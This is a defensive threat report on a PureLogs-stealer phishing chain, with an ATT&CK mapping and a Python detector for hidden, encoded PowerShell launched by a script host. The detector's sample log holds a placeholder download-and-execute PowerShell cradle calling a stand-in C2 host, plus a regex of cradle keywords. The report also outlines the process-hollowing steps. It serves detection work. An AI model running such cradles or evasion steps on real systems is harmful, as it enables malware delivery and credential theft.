EXECUTIVE SUMMARY:
A phishing campaign has been identified targeting Windows users through deceptive purchase-order-themed emails containing malicious RAR attachments. The campaign relies on social engineering techniques to convince recipients to open embedded JavaScript files that initiate a multi-stage infection chain. Once executed, the attack deploys a variant of the PureLogs information stealer designed to harvest sensitive information, including credentials, browser data, and other confidential system details. The operation demonstrates how threat actors continue to abuse trusted scripting technologies and fileless execution methods to bypass conventional security controls and increase infection success rates.
The infection process begins with the malicious JavaScript decrypting embedded PowerShell commands and dropping temporary script files onto the system before executing them with a hidden window. The PowerShell payload then runs the later stages in memory and uses process hollowing to inject malicious .NET modules into legitimate Windows components at runtime. The malware abuses Windows APIs including CreateProcessA, VirtualAllocEx, WriteProcessMemory, and ResumeThread: the target process is created in a suspended state, the payload is allocated and written into its address space, and the main thread is resumed so the malicious code runs under the identity of a trusted binary, which conceals its execution from traditional detection mechanisms. Once active, the downloader component communicates with remote command-and-control infrastructure to retrieve additional PureLogs plugins capable of credential theft, browser data collection, and payload delivery. The campaign also incorporates layered obfuscation, Base64 encoding, encrypted payloads, and in-memory execution to complicate forensic analysis and defensive monitoring.
The campaign demonstrates the growing sophistication of phishing operations that combine social engineering with advanced malware delivery and defense-evasion techniques. The use of obfuscated JavaScript, fileless PowerShell execution, and process hollowing significantly increases the risk to enterprise and individual environments by reducing forensic visibility and bypassing conventional security controls. Organizations should strengthen email filtering, restrict script-based execution, monitor abnormal PowerShell activity, and deploy endpoint detection capable of identifying suspicious in-memory behaviors associated with PureLogs and similar information-stealing threats.
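The first stage of the chain described above (a script host launching a hidden, encoded PowerShell that drops a temporary .ps1) and the recommendation to monitor abnormal PowerShell activity, worked as detection logic. This is an added example and is not code from the report or from the PureLogs operators. It runs over constructed process-creation records using Sysmon Event ID 1 field names (ParentImage, Image, CommandLine), flags the script-host to PowerShell parent-child pair, the hidden-window and encoded-command switches and scripts executed from a Temp directory, and decodes the -EncodedCommand blob (which is UTF-16LE Base64, not UTF-8) to look for a download cradle. The host name, paths and stage-two command are placeholders, not indicators from the campaign.

```python
"""Detect the script-host -> hidden, encoded PowerShell chain over constructed
process-creation records (added example; field names follow Sysmon Event ID 1)."""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # default handlers for .js/.jse
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts abbreviated switches: -WindowStyle Hidden may be written
# "-w hidden" or "-win h", and -EncodedCommand as "-e", "-ec" or "-enc". These
# patterns are heuristics for those forms; "-ep bypass" must not match as -e.
HIDDEN_RE = re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
TEMP_PS1_RE = re.compile(r"\\temp\\[^\s'\"]+\.ps1\b", re.I)
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b",
    re.I)


@dataclass
class Finding:
    parent: str
    image: str
    flags: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # decoded -EncodedCommand text, if present


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'Key=Value|Key=Value' record (real Sysmon is XML)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE; decoding it as UTF-8 yields NUL-interleaved
    text. Returns None for invalid Base64 or an odd-length (truncated) buffer."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: Dict[str, str]) -> Finding:
    """Flag one process-creation event for the indicators named in the report."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    finding = Finding(parent=parent, image=image)
    if image not in POWERSHELL:
        return finding
    if parent in SCRIPT_HOSTS:
        finding.flags.append("script_host_spawned_powershell")
    if HIDDEN_RE.search(cmd):
        finding.flags.append("hidden_window")
    if TEMP_PS1_RE.search(cmd):
        finding.flags.append("script_file_in_temp")
    match = ENCODED_RE.search(cmd)
    if match:
        finding.flags.append("encoded_command")
        finding.decoded = decode_encoded_command(match.group(1))
        if finding.decoded and CRADLE_RE.search(finding.decoded):
            finding.flags.append("download_cradle_in_decoded_command")
    return finding


def scan(log: str) -> List[Finding]:
    """Return a Finding for every record that raised at least one flag."""
    results = []
    for line in log.strip().splitlines():
        if line.strip():
            finding = analyse(parse_event(line))
            if finding.flags:
                results.append(finding)
    return results


# ---- constructed sample telemetry (placeholders, not real indicators) --------
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
# Placeholder stage-two command of the kind the JavaScript stage hands to PowerShell.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/p.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode("ascii")
SAMPLE_LOG = "\n".join([
    f"ParentImage={WSCRIPT}|Image={PS}|CommandLine=powershell.exe -NoP -W Hidden -Ep Bypass -Enc {ENCODED}",
    rf"ParentImage=C:\Windows\explorer.exe|Image={PS}|CommandLine=powershell.exe Get-ChildItem C:\Users",
    rf"ParentImage={WSCRIPT}|Image={PS}|CommandLine=powershell.exe -w hidden -ep bypass -File C:\Users\Bob\AppData\Local\Temp\tmp9A3F.ps1",
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.parent} -> {f.image}: {', '.join(f.flags)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

The second record (explorer.exe launching an interactive PowerShell) raises no flag, which is the point of keying on the parent process and the switches rather than on powershell.exe alone. Where PowerShell Script Block Logging is enabled, the decoded content of an encoded command also appears in event 4104 of the Microsoft-Windows-PowerShell/Operational log, so the same cradle pattern can be applied there without Base64 handling.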
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1027.010 | Obfuscated Files or Information | Command Obfuscation |
| Defense Evasion | T1218.011 | System Binary Proxy Execution | Rundll32 |
| Defense Evasion | T1055.012 | Process Injection | Process Hollowing |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Discovery | T1082 | System Information Discovery | - |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1105 | Ingress Tool Transfer | - |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |